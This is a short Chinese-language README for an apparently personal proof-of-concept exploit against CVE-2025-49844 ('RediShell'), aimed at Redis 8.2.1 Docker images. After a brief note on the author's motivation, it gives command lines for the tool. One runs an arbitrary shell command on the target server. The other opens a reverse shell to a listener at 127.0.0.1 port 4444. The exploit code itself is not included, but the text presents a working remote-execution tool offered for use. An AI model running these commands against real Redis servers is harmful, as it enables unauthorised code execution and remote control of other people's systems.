這是本人針對 CVE-2025-49844(又稱 RediShell)的個人概念驗證。
支援的目標建置版本:
redis:8.2.1-alpine Docker 映像redis:8.2.1-bookworm Docker 映像它有點笨拙,可能不如 Wiz Research 的那麼好。不過,我很高興能在 Hexacon 2025 演講影片上傳前讓它運作起來,而且調查過程讓我獲益良多。
執行單向 shell 指令:
$ uv run cve-2025-49844 command "echo 'hello world' > /data/hello.txt"
連線反向 shell:
$ uv run cve-2025-49844 rshell -l 127.0.0.1 -p 4444